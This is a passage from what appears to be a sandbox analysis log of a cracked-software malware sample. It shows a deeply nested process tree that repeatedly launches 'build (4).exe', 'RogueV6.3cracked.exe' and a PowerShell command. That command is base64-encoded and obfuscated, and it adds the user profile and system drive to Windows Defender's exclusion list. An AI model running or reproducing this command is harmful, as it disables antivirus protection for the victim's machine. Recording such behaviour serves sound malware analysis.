        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        137⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        137⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        137⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        138⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        138⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        138⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        139⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        139⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        139⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        140⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        140⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        140⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        141⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        141⤵
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        141⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        142⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        142⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        142⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        143⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        143⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        143⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        144⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        144⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        144⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        145⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        145⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        145⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        146⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        146⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        146⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        147⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        147⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        147⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        148⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        148⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        148⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        149⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        149⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        149⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        150⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        150⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        150⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        151⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        151⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        151⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        152⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        152⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        152⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        153⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        153⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        153⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        154⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        154⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        154⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        155⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        155⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        155⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        156⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        156⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        156⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        157⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        157⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        157⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        158⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        158⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        158⤵
        
        PID:4172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        159⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        159⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        159⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        160⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        160⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        160⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        161⤵
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        161⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        161⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        162⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        162⤵
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        162⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        163⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        163⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        163⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
